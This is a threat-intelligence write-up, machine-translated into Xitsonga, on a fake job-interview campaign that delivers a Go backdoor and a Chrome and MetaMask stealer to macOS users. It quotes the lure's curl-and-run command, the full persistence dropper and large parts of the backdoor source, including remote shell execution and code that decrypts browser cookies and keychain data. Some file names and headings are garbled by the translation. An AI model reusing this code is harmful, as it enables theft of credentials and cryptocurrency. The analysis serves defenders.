Ti Cybercrooks Ti Tirhisa Ti Fake Job Listings Ku Yiva Crypto

Yi tsariwe hi Xipano xa Moonlock Lab xa MacPaw

Pfhumba ra inthanete leri yaka emahlweni ri kongomisa eka lava lavaka ntirho hi tiwebsite ta vuxisi ta mimbulavurisano, ri va kanganyisa leswaku va kopa nyangwa wa le ndzhaku lowu nga ambalangiki nchumu kambe wu tirhaka swinene. Ku hambana ni malware leyi rharhanganeke leyi tirhisaka tindlela to pfilunganya, nhlaselo lowu wu titshege hi ku olova—ku yisa khodi ya xihlovo etlhelo ka Go binary, leswi endlaka leswaku yi va leyi tsemakanyaka pulatifomo. Lexi karhataka ngopfu i ku ringeta ka yona ku tekela mpfumelelo wa xiengetelo xa Chrome lexi fambelanaka na mali ya crypto MetaMask, leswi nga ha herisaka swipachi swa vahlaseriwa.

Pfhumba leri ri tshama ri ri karhi ri tirha, laha minkarhi hinkwayo tidomeni letintshwa ti vonakaka ti koka vahlaseriwa vo tala. Valavisisi vo tala va vuhlayiseki bya munhu hi xiyexe ni tikhampani, to tanihi SentinelUn’we , . dmpdump , na ENKI Xihuku xo basa , va kandziyise minxopaxopo ya kahle swinene. Xipano xa hina xi endle ndzavisiso lowu tiyimeleke, naswona eka xihloko lexi, hi avelana leswi hi swi kumeke na tindlela to hlota.

Xipano xa Moonlock Lab xi sungule ku landzelela malware leyi hi ku kongoma hi October 9, 2024, loko swiphemu swo sungula swa nyangwa wa le ndzhaku swi sungula ku humelela. Backdoor i muxaka wa software yo biha leyi tumbelaka eka sisiteme naswona yi pfumelela vatlangi va nxungeto ku tirhisa swileriso va ri ekule, onge hi loko va ri vini lava nga enawini va xitichi xa ntirho. Minhlaselo leyi hi ntolovelo yi tirhisa leswi vuriwaka tisevha ta C2 (Command and Control) ku rhumela ni ku tirhisa swileriso.

Lexi hambanisaka nhlaselo lowu na wun’wana lowu hi ntolovelo hi wu xiyaka hileswaku wu na switeji swo tala naswona wu endleriwe ku phikelela eka muchini wa muhlaseriwa ematshan’wini yo tirhisa ku khuluka ka ku yiva data ka xibalesa xin’we. Nkatsakanyo lowu heleleke wa switeji swa nhlaselo wu nga voniwa eka xifaniso lexi nga laha hansi.

Thread yo sungula leyi hleriweke kahle eka X leyi hi yi xiyeke yi postiwile hi @tayvano_ . , loyi a avelane rungula malunghana ni pfhumba leri nga ha vaka ri ri ni khombo leri ngopfu-ngopfu ri kongomisiweke eka vaendli va tisoftware lava lavaka mintirho eka tikhampani ta blockchain.

' Hi ntolovelo yi sungula hi "muthori" ku suka eka khamphani leyi tivekaka xikombiso Kraken, MEXC, Gemini, Meta. Ti pay ranges + messaging style swa koka rinoko—hambi ku ri eka lava nga laviki ntirho hi ku hiseka. Ngopfu-ngopfu hi ku tirhisa Linkedin. Nakambe tisayiti ta ti-freelancer, tindhawu ta mintirho, tg, discord, na swin’wana.

Ku kuma vuhundzuluxeri bya sweswinyana bya malware leyi, a swi ri swa nkoka ku languta tidomeni letintshwa leti khomaka tisayiti ta vuxisi ta mbulavurisano. Hi xikongomelo lexi, ntlawa wa hina wu titshege hi swikombiso swimbirhi leswi nga cinciki leswi tidomeni leti ti avelana swona:

• Xifaniso xa URL lexi fanaka xa “/video-questions/create/” lexi landzeriwaka hi ID leyi nga na khodi yo tika:

• Xifaniso lexi fanaka ( logo.png ) eka matluka:

Hambi leswi tin’wana ta tidomeni leti tirhisiweke hi nkarhi wa pfhumba leri ti pfariwaka, letintshwa ti ya emahlweni ti humelela, laha ya sweswinyana ya ha riki eka inthanete: smarthiretop[.]online . Xipano xa hina xi vonile ku tlula 20 wa tidomeni leti tirhaka ku sukela hi Nyenyankulu 2024.

Endzhaku ko lavisisa tidomeni, hi kume leswaku tin’wana ta tona ti avelana adirese ya IP yin’we. Leswi swi tala ku humelela hikuva vahlaseri va tirhisa vaphakeri va vuhlayiselo lava nga riki na swibalesa, lava pfumelelaka tidomeni to tala ku rhurhela eka sevha yin’we. Ku engetela kwalaho, ku rhurhela tidomeni to tala eka IP yin’we swi endla leswaku vatlangi va nxungeto va kota ku cinca-cinca tidomeni handle ko cinca switirhisiwa swa le ndzhaku.

Xitirhisiwa lexi xo biha xi khomeriwe eka vukorhokeri byo hambana-hambana lebyi hangalasiweke emisaveni hinkwayo. Hilaha swi kombisiweke hakona eka mepe lowu nga laha hansi, tisevha to tala ti kumeka eUS, laha tin’wana ti hangalakeke ematikweni man’wana.

Xileriso xo biha lexi lava vulavurisaneke va komberiweke ku xi tirhisa xi tumbeta efasitereni leri humelelaka loko va endzela webusayiti leyi nga ni khombo. I khodi ya JS, leyi hlanganisiweke eka fayili ya main.39e5a388.js eka mhaka leyi. Mavito yo tano ya tifayela hi ntolovelo ya endliwa hi ku tirhisa endlelo ro hashing kumbe ro printa tintiho hi nkarhi wa endlelo ro aka ra xitirhisiwa xa webu (Xikombo: https://urlscan.io/mbuyelo/0ad23f64-4d61-49c8-8ed8-0d33a07419f4 ).

Rin’wana ra matluka ri na fayili leyi ya JS leyi nghenisiweke na hash leyi landzelaka ya SHA256:

• f729af8473bf98f848ef2dde967d8d301fb71888ee3639142763ebb16914c803

Hi nga swi vona hi ku olova leswaku endzeni ka fayili ya JS leyi akiweke ku ni swileriso leswi fanaka leswi vahlaseriwa va komberiweke ku swi nghenisa:

Endzhaku ko twisisa ndlela leyi mutlangi wa nxungeto a hangalasaka malware ha yona, xikongomelo xa hina lexikulu a ku ri ku hatlisa hi kuma swikombiso ni ku endla masayini ya vatirhisi va hina. Ku boxiwa ko sungula loku kongomeke ka tisampulu leti "lunghekeleke vuhumelerisi" na ti-hash ta tona ta SHA-256 leti hi ti kumeke a ku ri eka thread leyi:

Nkanelo wa ririmi ra Xitsonga eka swiyenge swa 1873343968894689472 .

Yi katsa ti- hash ta ntlhanu, ku nga ta:

• 96e78074218a0f272f7f94805cabde1ef8d64ffb *fayili.zip;
• 86dea05a8f40cf3195e3a6056f2e968c861ed8f1 *ti-nodejs.zip;
• 321972e4e72c5364ec1d5b9e488d15c641fb1819 *nvidia-xiviri xa xiviri.zip;
• 3405469811bae511e62cb0a4062aadb523cad263 *Voko_ra_VCam64.zip;
• c0baa450c5f3b6aacde2807642222f6d22d5b4bb *VCam_intel.zip.

Ku engetela eka leswi, ntlawa wa hina wu sungule ku teka swikripti leswi nga ni khombo onge hiloko hi kanganyisiwa leswaku hi swi dawuniloda, leswi fanaka ni vahlaseriwa. Hi nkarhi wun’wana, xileriso lexi landzelaka xi tirhisiwile eka tiwebsite ta vuxisi ta mimbulavurisano:

Xileriso lexi humaka eka xifaniso xa xikirini (u nga endli!):

 sudo sh -c 'curl -k -o /var/tmp/ffmpeg.sh https://api.nvidia-release.org/ffmpeg-ar.sh && chmod +x /var/tmp/ffmpeg.sh && nohup bash /var/tmp/ffmpeg.sh >/dev/null 2>&1 &'

Yi endla swiendlo leswi xaxametiweke laha hansi:

• Ku teka fayili ya ffmpeg-ar.sh ku suka eka api[.]nvidia-release[.]org;
• Yi hlayisa eka /var/tmp/ffmpeg.sh;
• Ku tirhisa fayili no kongomisa vuhumelerisi hinkwabyo eka /dev/null ku byi fihla eka mutirhisi.

Endzeni ka fayili ya ffmpeg.sh leyi hlayisiweke eka folda ya nkarhinyana, hi nga kuma ndhawu yo nghena eka nhlaselo lowu, lowu katsaka:

• Ku dawuniloda tifayela ta ZIP ta xiteji xa vumbirhi hi payload;
• Ku veka fayili ya PLIST na ku tsarisa vukorhokeri ku phikelela;
• Ku endla ntirho wo basisa.

Hilaha hi nga swi vonaka hakona eka tsalwa leri nga laha hansi, ri endleriwe hi ku kongoma macOS, ku hambana ka Intel na ARM. Endzhaku ka loko yi hlamusele modele wa sweswi wa CPU, yi dawuniloda akhavhiyu ya ZIP leyi nga ni tifayela to tala. Nxopaxopo wa vuxokoxoko byo tala bya tsalwa leri wu nga kumeka eka blog leyi , hilaha swi boxiweke hakona hi SentinelOne eka ya vona xiviko xa sweswinyana .

 #!/bin/bash # Define variables for URLs ZIP_URL_ARM64="https://api.nvidia-cloud.online/VCam1.update" ZIP_URL_INTEL="https://api.nvidia-cloud.online/VCam2.update" ZIP_FILE="/var/tmp/VCam.zip" # Path to save the downloaded ZIP file WORK_DIR="/var/tmp/VCam" # Temporary directory for extracted files EXECUTABLE="vcamservice.sh" # Replace with the name of the executable file inside the ZIP APP="ChromeUpdateAlert.app" # Replace with the name of the app to open PLIST_FILE=~/Library/LaunchAgents/com.vcam.plist # Path to the plist file # Determine CPU architecture case $(uname -m) in arm64) ZIP_URL=$ZIP_URL_ARM64 ;; x86_64) ZIP_URL=$ZIP_URL_INTEL ;; *) exit 1 ;; # Exit for unsupported architectures esac # Create working directory mkdir -p "$WORK_DIR" # Function to clean up cleanup() { rm -rf "$ZIP_FILE" } # Download, unzip, and execute if curl -s -o "$ZIP_FILE" "$ZIP_URL" && [[ -f "$ZIP_FILE" ]]; then unzip -o -qq "$ZIP_FILE" -d "$WORK_DIR" if [[ -f "$WORK_DIR/$EXECUTABLE" ]]; then chmod +x "$WORK_DIR/$EXECUTABLE" else cleanup exit 1 fi else cleanup exit 1 fi # Step 4: Register the service mkdir -p ~/Library/LaunchAgents cat > "$PLIST_FILE" <<EOL <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.vcam</string> <key>ProgramArguments</key> <array> <string>$WORK_DIR/$EXECUTABLE</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <false/> </dict> </plist> EOL chmod 644 "$PLIST_FILE" if ! launchctl list | grep -q "com.vcam"; then launchctl load "$PLIST_FILE" fi # Step 5: Run ChromeUpdateAlert.app if [[ -d "$WORK_DIR/$APP" ]]; then open "$WORK_DIR/$APP" & fi # Final cleanup cleanup

Rheferense: XitsongwatsongwanaNhlayo hinkwayo

Swilo leswi nga endzeni ka akhavhiyu (vuhundzuluxeri bya Intel CPU) leswi tsalwa ri swi tisaka swi xaxametiwile laha hansi:

Tifayili hinkwato leti nga eka akhavhiyu ti nga hambanisiwa hi mintlawa yi nga ri yingani:

• Swiphemu swa khodi ya xihlovo ya Go na ti-binary ta yona ( https://github.com/golang/ku famba hi xitsonga ) .
• ChromeUpdateAlert.app – AppBundle leyi nga na binary ya Mach-O leyi hlengeletaka IP na phaswedi ya mutirhisi
• Nyangwa wa le ndzhaku lowu tsariweke hi Go na muyivi
• vcamservice.sh – Xikripti lexi sungulaka fayili leyikulu leyi tirhisiwaka leyi simekiweke eka Go

Lexi tsakisaka, archive yi kwalomu ka 75 MB hi vukulu, ngopfu ngopfu hikuva yi katsa swiphemu swo tala swa tilayiburari ta Go leti nga enawini na ti binary.

Nxopaxopo wa Muyivi wa Phasiwedi ya Mach-O

Yin’wana ya tifayela leti hi ti voneke ti tirhisiwa nkarhi wo leha eka nhlaselo lowu i Mach-O universal binary leyi nga na 2 wa ti architectures, leyi thyiweke CameraAccess ( SHA256: 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f4ebd5677e352c57e992a ).

Yi tiendla xifaniso xa Google Chrome, yi endla leswaku vatirhisi va nkarhi na nkarhi va tshemba leswaku fayili leyi yi le nawini naswona yi va sivela ku yi susa.

Khodi leyi yi tsariwile hi Swift, naswona a ku kumeki tindlela to tiya ta ku pfilunganya, leswi endleke leswaku swi olova swinene ku twisisa ku khuluka ka ku dlayiwa.

Yi kombisa fasitere leri langutekaka ku fana na fasitere ra xitiviso xa sisiteme, ri kombela mutirhisi ku pfumelela ku nghena eka microphone, ku vuriwa leswaku ri komberiwile eka xitirhisiwa xa Google Chrome.

Hambi loko mutirhisi a hlawula "Ndzi Tsundzuxa Endzhaku," fasitere ra xitsundzuxo xa phaswedi ra ha humelela.

App leyi yi vula leswaku yi lava ku nghena hi microphone; hambiswiritano, yi ni sandbox, naswona a ku endliwi xikombelo xa mpfumelelo xa xiviri xa microphone.

Endzhaku ka loko mutirhisi a nghenise phaswedi ya yena, malware yi kombela adirese ya IP ya le handle ya host leyi yi tirhaka eka yona. Kutani yi rhumela fayili ya password.txt eka folda ya Dropbox leyi thyiweke vito ra adirese ya IP ya le handle ya mutirhisi.

Eka xifaniso xa xikirini lexi nga laha hansi Dropbox API URL yi nga voniwa.

Loko hi ri karhi hi kambisisa thrafikhi ya netiweke, hi nga vona matshalatshala yo kuma adirese ya IP ya mani na mani ya muhlaseriwa.

Endzhaku ka loko adirese ya IP yi amukeriwile, hi nga vona swikombelo eka Dropbox leswaku hi ta layicha mpatswa wa IP-password hi ku tirhisa switifiketi leswi nga na khodi yo tika.

Xipano xa hina xi vikile mhangu leyi eka Dropbox, kun’we na switifiketi leswi tirhisiweke ku fambisa pfhumba leri ro xanisa.

Nxopaxopo wa nyangwa wa le ndzhaku lowu tsariweke hi Go

I swa nkoka ku xiya leswaku fayili ya ZIP leyi dawunilodiweke hi tsalwa ra ffmpeg.sh yi na khodi ya xihlovo ya matsalwa yo olova ya nyangwa wa le ndzhaku, leswi vulaka leswaku a yi hlengeletiwanga ka ha ri emahlweni kumbe ku pfilunganyeka. Swi hatlisisile swinene nxopaxopo kambe swi tlhele swi tlakusa swivutiso mayelana na attribution leyi faneleke. A swi bohi ku vula leswaku mintlawa ya APT ku suka eka DPRK hi ntolovelo yi rharhanganile swinene.

Qhinga rin’wana leri nga tolovelekangiki i ku katsa Go binary ( /bin/go ) eka akhavhiyu ematshan’wini yo hlengeleta khodi leyi heleleke ntsena. Kambe tanihi leswi Go ku nga riki xitirhisiwa xa ntolovelo eka tisisiteme to tala to tirha, vatlangi va nxungeto va nga ha va va yi katsile leswaku yi fambisana ku antswa. Leswi swa twala loko hi tekela enhlokweni leswaku malware leyi yi cross-platform naswona yi kongomisa eka macOS, Linux, na Windows hi nkarhi wun’we.

Girafamu leyi kombisaka vuxaka na nhlamuselo ya vuxokoxoko bya xikombiso xin’wana na xin’wana lexi xiyekaka, yi nga kumeka laha: Nkoka wa nkoka

Ndhawu yo nghena eka yona

Endzeni ka archive, ku na script leyi vuriwaka vcamupdate.sh . Yi tirha hi ku hatlisa endzhaku ko pfula naswona yi tirhisa ntsena /bin/go (leyi hlanganisiweke eka ZIP) loko yi ri karhi yi hundzisa ndlela eka xitirhisiwa lexikulu xa Golang ( app.go eka mhaka leyi).

 #!/bin/bash # Set the working directory to the folder where this script is located cd "$(dirname "$0")" echo "Installing Dependencies..." project_file="app.go" ./bin/go run "$project_file" exit 0

Xitirhisiwa xo nghena ( app.go ) xi na vutihlamuleri byo tumbuluxa UUID yo hlawuleka ya xitichi xa ntirho xa mutirhisi, ku sungula URL ya C2, na ku sungula xirhendzevutana lexikulu. Eka khodi hi nga vona mavonelo ya layini yin’we, ku kandziyisiwa ka marungula yo seketela, na khodi yin’wana leyi nga na mavonelo. Yi tlhela yi katsa ti-URL kumbexana leti endleriweke ku kamberiwa, leti rivariweke ku susiwa hi vaendli. Hambi leswi adirese ya IP ya C2 yi hambaneke eka pfhumba lerikulu, swikombiso ku suka hi 2024 swi avelane ntirho lowu fanaka naswona swi kongomisiwile eka datha leyi fanaka.

Endzhaku ku vitaniwa eka core.StartMainLoop(id, url) ku hi tisa eka core/ folda leyi nga na tifayela ta loop.go na work.go. Fayili ya loop.go ngopfungopfu yi na vutihlamuleri byo amukela na ku hetisisa swileriso ku suka eka C2, ku vitana ti submodules leti hlengeletaka data ya nkoka, na ku yi layicha eka sevha ya le kule. Yi na mintirho yo tala, 8 wa yona hi nga tsakela ku yi kandziyisa no yi lavisisa hi vuxokoxoko.

Ntirho StartMainLoop

Ntirho lowu wu tirhisa submodule ya config ku sungula swileriso leswi kumekaka na ku yingisela leswi nghenaka. Laha hansi u nga kuma tafula leri nga na swileriso hinkwaswo xikan’we na tikhodi ta swona leti fambelanaka. Nxopaxopo wa vuxokoxoko bya ntirho wa backdoor wu nga kumeka eka nkandziyiso lowu .

Hi ku ya hi xileriso lexi amukeriweke ku suka eka C2, ntirho lowu faneleke wu ta vitaniwa.

 func StartMainLoop(id string, url string) { var ( msg_type string msg_data [][]byte msg string cmd string cmd_type string cmd_data [][]byte alive bool ) // initialize cmd_type = config.COMMAND_INFO alive = true for alive { func() { // recover panic state defer func() { if r := recover(); r != nil { cmd_type = config.COMMAND_INFO time.Sleep(config.DURATION_ERROR_WAIT) } }() switch cmd_type { case config.COMMAND_INFO: msg_type, msg_data = processInfo() case config.COMMAND_UPLOAD: msg_type, msg_data = processUpload(cmd_data) case config.COMMAND_DOWNLOAD: msg_type, msg_data = processDownload(cmd_data) case config.COMMAND_OSSHELL: msg_type, msg_data = processOsShell(cmd_data) case config.COMMAND_AUTO: msg_type, msg_data = processAuto(cmd_data) case config.COMMAND_WAIT: msg_type, msg_data = processWait(cmd_data) case config.COMMAND_EXIT: alive = false msg_type, msg_data = processExit() default: panic("problem") } msg = command.MakeMsg(id, msg_type, msg_data) cmd, _ = transport.HtxpExchange(url, msg) cmd_type, cmd_data = command.DecodeMsg(cmd) }() } }

Ntirho wa phuroseseInfo

Ntirho lowu wu ta hlengeleta vuxokoxoko bya masungulo bya sisiteme yo fana na vito ra mutirhisi, vito ra host, vuhundzuluxi bya OS, na architecture. Swi fanerile ku xiya leswaku vunyingi bya va-infostealers lava dumeke va hlengeleta rungula ro tala ra sisiteme ku tlula malware leyi.

 func processInfo() (string, [][]byte) { user, _ := user.Current() host, _ := os.Hostname() os := runtime.GOOS arch := runtime.GOARCH print("user: " + user.Username + ", host: " + host + ", os: " + os + ", arch: " + arch + "\n") data := [][]byte{ []byte(user.Username), []byte(host), []byte(os), []byte(arch), []byte(config.DAEMON_VERSION), } return config.MSG_INFO, data }

Endlelo ra ntirhoUpload

Eka xiyimo lexi, upload yi yimela endlelo ro rhumela fayili ya archive ku suka eka C2 ku ya eka host leyi tluleriweke, ku landzela decompression ya yona. Swi tlhela swi kombisa loko ku herisiwa ka ntshikelelo ku humelerile.

 func processUpload(data [][]byte) (string, [][]byte) { var log string var state string path := string(data[0]) buf := bytes.NewBuffer(data[1]) err := util.Decompress(buf, path) if err == nil { log = fmt.Sprintf("%s : %d", path, len(data[1])) state = config.LOG_SUCCESS } else { log = fmt.Sprintf("%s : %s", path, err.Error()) state = config.LOG_FAIL } return config.MSG_LOG, [][]byte{ []byte(state), []byte(log), } }

Endlelo ra ntirhoDownload

Ntirho lowu i ku tlhelela endzhaku ka lowu hundzeke. Yi endla ku tshikileriwa ka xikombo lexi nga na tifayela leti hlengeletiweke ka ha ri emahlweni eka tar.gz archive.

 func processDownload(data [][]byte) (string, [][]byte) { var file_data []byte var err error path := string(data[0]) _, file := filepath.Split(path) info, _ := os.Stat(path) if info.IsDir() { var buf bytes.Buffer err = util.Compress(&buf, []string{path}, false) file = fmt.Sprintf("%s.tar.gz", file) file_data = buf.Bytes() } else { file_data, err = os.ReadFile(path) } if err == nil { return config.MSG_FILE, [][]byte{[]byte(config.LOG_SUCCESS), []byte(file), file_data} } else { return config.MSG_FILE, [][]byte{[]byte(config.LOG_FAIL), []byte(err.Error())} } }

Ntirho wa phuroseseOsShell

Lowu i ntirho lowu nyangwa wa le ndzhaku wa ntiyiso wu faneleke ku va na wona. Yi rindzele xileriso xa ku tihlawulela naswona yi ringeta ku xi hetisisa. Xileriso xi nga ha va na swivutiso swa layini ya swileriso, naswona vuhumelerisi byi ta nghenisiwa hi ku kongoma eka C2.

 func processOsShell(data [][]byte) (string, [][]byte) { mode := string(data[0]) // mode timeout, _ := strconv.ParseInt(string(data[1]), 16, 64) shell := string(data[2]) args := make([]string, len(data[3:])) for index, elem := range data[3:] { args[index] = string(elem) } if mode == config.SHELL_MODE_WAITGETOUT { // wait and get result mode ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)) defer cancel() cmd := exec.CommandContext(ctx, shell, args...) out, err := cmd.Output() if err != nil { return config.MSG_LOG, [][]byte{ []byte(config.LOG_FAIL), []byte(err.Error()), } } else { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), out, } } } else { // start and detach mode c := exec.Command(shell, args...) err := c.Start() if err != nil { return config.MSG_LOG, [][]byte{ []byte(config.LOG_FAIL), []byte(err.Error()), } } else { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), []byte(fmt.Sprintf("%s %s", shell, strings.Join(args, " "))), } } } }

Ntirho processAuto

Leyi i ndhawu yo nghena eka ku khuluka ka ku yiva. Ntirho lowu wu na swikombelo swo tala eka tifayela leti kumekaka eka auto/ folda. Swi katsa va-grabber, va-processor kumbe va- modifier va data leyi landzelaka:

• Xilotlelo xa xilotlelo
• Data yo nghena ya Chrome
• Swikhukhi swa Chrome
• Xiengetelo xa Chrome MetaMask (swikhiya, mpfumelelo, na swin’wana) .
• Xivumbeko xa Chrome

 func processAuto(data [][]byte) (string, [][]byte) { var ( msg_type string msg_data [][]byte ) mode := string(data[0]) switch mode { case config.AUTO_CHROME_GATHER: msg_type, msg_data = auto.AutoModeChromeGather() case config.AUTO_CHROME_PREFRST: msg_type, msg_data = auto.AutoModeChromeChangeProfile() case config.AUTO_CHROME_COOKIE: msg_type, msg_data = auto.AutoModeChromeCookie() case config.AUTO_CHROME_KEYCHAIN: msg_type, msg_data = auto.AutoModeMacChromeLoginData() default: msg_type = config.MSG_LOG msg_data = [][]byte{[]byte(config.LOG_FAIL), []byte("unknown auto mode")} } return msg_type, msg_data }

Endlelo ra ntirhoWait

Ntirho wa vukorhokeri lowu tirhisiwaka ku rhumela backdoor eka xiyimo xo etlela, wu rindzele swileriso swin’wana.

 func processWait(data [][]byte) (string, [][]byte) { duration, _ := strconv.ParseInt(string(data[0]), 16, 64) time.Sleep(time.Duration(duration)) send_data := make([]byte, 128) rand.Read(send_data) return config.MSG_PING, [][]byte{send_data} }

Endlelo ra ntirhoExit

Lowu i ntirho wa vukorhokeri lowu tirhisiwaka ku huma eka xirhendzevutana lexikulu xa vuhlanganisi na C2.

 func processExit() (string, [][]byte) { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), []byte("exited"), } }

Ku tirhisiwa ka nhlengeleto wa datha ya Chrome hi ku tisungulela

Folda ya auto/ yi na sete ya Go-apps:

• basic.go

   const ( userdata_dir_win = "AppData\\Local\\Google\\Chrome\\User Data\\" userdata_dir_darwin = "Library/Application Support/Google/Chrome/" userdata_dir_linux = ".config/google-chrome" extension_dir = "nkbihfbeogaeaoehlefnkodbefgpgknn" extension_hash_key = "protection.macs.extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn" extension_setting_key = "extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn" secure_preference_file = "Secure Preferences" logins_data_file = "Login Data" keychain_dir_darwin = "Library/Keychains/login.keychain-db" )

  • Laha hi nga vona ti constants leti hlamuseriweke leti nga na data leyi kongomisiweke ku yi khoma, swi va erivaleni leswaku nhlokomhaka leyikulu yi le ka ku engeteriwa ka MetaMask.

• chrome_ku cinca_ku_hlawulela.go

   // get json string func getExtJsonString() string { return `{"active_permissions":{"api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"], "explicit_host":["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"], "manifest_permissions":[], "scriptable_host":["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]}, "commands":{"_execute_browser_action":{"suggested_key":"Alt+Shift+M","was_assigned":true}},"content_settings":[], "creation_flags":38,"events":[],"first_install_time":"13361518520188298","from_webstore":false, "granted_permissions":{"api":["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"], "explicit_host":["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"], "manifest_permissions":[],"scriptable_host":["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]},"incognito_content_settings":[], "incognito_preferences":{},"last_update_time":"13361518520188298","location":4,"newAllowFileAccess":true,"path":"C:\\ProgramData\\11.16.0_0","preferences":{}, "regular_only_preferences":{},"state":1,"was_installed_by_default":false,"was_installed_by_oem":false,"withholding_permissions":false}` }

   // chrome kill if runtime.GOOS == "windows" { cmd := exec.Command("cmd", "/c", "taskkill /f /im chrome.exe") cmd.Run() } else { cmd := exec.Command("/bin/sh", "-c", "killall chrome") cmd.Run() }

  • Yi dlaya maendlelo hinkwawo ya Chrome lama tirhaka sweswi, naswona yi cinca mpfumelelo wo karhi wa ku engeteriwa ka MetaMask .
  • Ku lulamisiwa ka JSON ku ringanyeta mahanyelo lama nga vaka na khombo ya xiengetelo hikwalaho ka mpfumelelo wa xona wo anama na ndlela yo nghenisa hi voko.
  • Mpfumelelo wa " webRequest " wu pfumelela xiengetelo ku khoma na ku cinca swikombelo swa netiweke, ku endla leswaku ku yiva data kumbe nhlaselo wa vuxisi. Mpfumelelo wa " clipboardWrite " wu nga tirhisiwa ku khoma na ku cinca datha ya clipboard, leswi nga ha yiva tiadirese ta cryptocurrency kumbe tiphasiwedi.
  • Xiyenge xa " scriptable_host ", lexi katsaka " file:///* ", " https://*/* ", na " http://*/* ", xi endla leswaku ku endliwa swikripti eka tiwebsite hinkwato na ku nghena eka tifayela ta laha kaya, leswi pfumelelaka ku yiva switifiketi kumbe ku susiwa ka datha loku nga pfumeleriwangiki.
  • Xiyenge xa " explicit_host " xi nyika mfikelelo eka tidomeni leti fambelanaka na mali ya crypto, ku fana na https://*.infura.io/* na https://*.cx.metamask.io/* , leswi nga tirhisiwaka ku lawula mabindzu.
  • Nsimu ya " from_webstore ": false yi kombisa leswaku ku engeteriwa ku nghenisiwile hi voko kumbe hi tindlela leti nga pfumeleriwangiki, leswi ringanyetaka ku onhiwa loku nga kotekaka. Nsimu ya " swileriso " yi avela ndlela yo koma ya khibhodi ku endla leswaku ku engeteriwa ku tirha, leswi nga ha pfuxaka mahanyelo yo biha lama fihliweke.
  • Swilo leswi swi hlanganisiweke swi kombisa leswaku ku engeteriwa ku nga tirhisiwa eka ku nghena loku nga pfumeleriwangiki, ku yiva data, kumbe vuxisi bya timali.

• chrome_xikhukhi_darwin.go

   var ( SALT = "saltysalt" ITERATIONS = 1003 KEYLENGTH = 16 ) func getDerivedKey() ([]byte, error) { out, err := exec.Command( `/usr/bin/security`, `find-generic-password`, `-s`, `Chrome Safe Storage`, `-wa`, `Chrome`, ).Output() if err != nil { return nil, err } temp := []byte(strings.TrimSpace(string(out))) chromeSecret := temp[:len(temp)-1] if chromeSecret == nil { return nil, errors.New("Can not get keychain") } var chromeSalt = []byte("saltysalt") // @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157 key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New) return key, nil }

  • Yi tirhisiwa ku vuyisa phaswedi leyi fambelanaka na Google Chrome eka vuhlayiselo bya laha kaya.
  • Ku hlengeleta datha ya Keychain na vuhlayiselo byin'wana eka gatherchain.tar.gz .

• chrome_cookie_swin'wana.famba

  • Swi tano na kambe eka Linux.

• chrome_xikhukhi_ku hlula.go

  • Swi tano na kambe eka Windows.

• chrome_ku hlengeleta.famba

   func AutoModeChromeGather() (string, [][]byte) { print("=========== AutoModeChromeGather ===========", runtime.GOOS, "\n") var ( buf bytes.Buffer userdata_dir string path_list []string ) // gather userdata_dir = getUserdataDir() // file system search _ = filepath.Walk(userdata_dir, func(path string, info os.FileInfo, err error) error { if info.Name() == extension_dir && strings.Contains(path, "Local Extension Settings") { path_list = append(path_list, path) } return nil }) _ = util.Compress(&buf, path_list, true) print("=========== End ===========\n") // return data := make([][]byte, 3) data[0] = []byte(config.LOG_SUCCESS) data[1] = []byte("gather.tar.gz") data[2] = buf.Bytes() msg_type := config.MSG_FILE return msg_type, data

  • Ku hlengeleta swiletelo swa ku engeteriwa ka laha kaya (loko swi ri kona eka sisiteme) ivi u swi paka eka gather.tag.gz

Mahetelelo

Ku gimeta nxopaxopo wa hina, hi fanele ku kandziyisa tinhla ta nkoka swinene:

• Endzhaku ka ku yiva phaswedi loku humeleleke, xitichi xa ntirho xa muhlaseriwa xi nga nghenisiwa ekule hi ku tirhisa C2 ku yiva datha yo tala swinene, ku katsa na tifayela ta munhu hi xiyexe leti hlayisiweke eka sisiteme. Swi endla leswaku ndlela leyi ya malware yi va ni khombo ku tlula vayivi va ntolovelo lava hi ntolovelo va tirhaka eka sisiteme kan’we, va hlengeleta ntsena tifayela leti nga eka nxaxamelo wa vona.
• Khodi ya le ndzhaku yi tsariwa hi ku ya hi maendlelo lamanene ya minongonoko, mavonelo ya tshikiwa tani hi leswi ya nga xiswona, leswi siyaka xivutiso lexi pfulekeke xa leswaku hikokwalaho ka yini khodi yi nga hlengeletiwanga ka ha ri emahlweni.
• I ku engeteriwa kun’we ntsena loku fambelanaka na mali ya crypto loku kongomisiweke, kumbexana ku hlayela ku kuma mfikelelo wa le kule ku lavisisa hi voko switirhisiwa swin’wana swa crypto leswi dumeke na datha ya nkoka eka sisiteme.
• Pfhumba ra ha ya emahlweni, leswi kombisaka leswaku maqhinga ya vatlangi va nxungeto ya tshama ya ri karhi ya tirha naswona a ya lavi ku cinca ka xihatla. Hambiswiritano, hi tshemba leswaku matshalatshala yo fana ma nga ha humelela ku nga ri khale hi switirhisiwa leswi pfuxetiweke.

IOC

Tidomeni

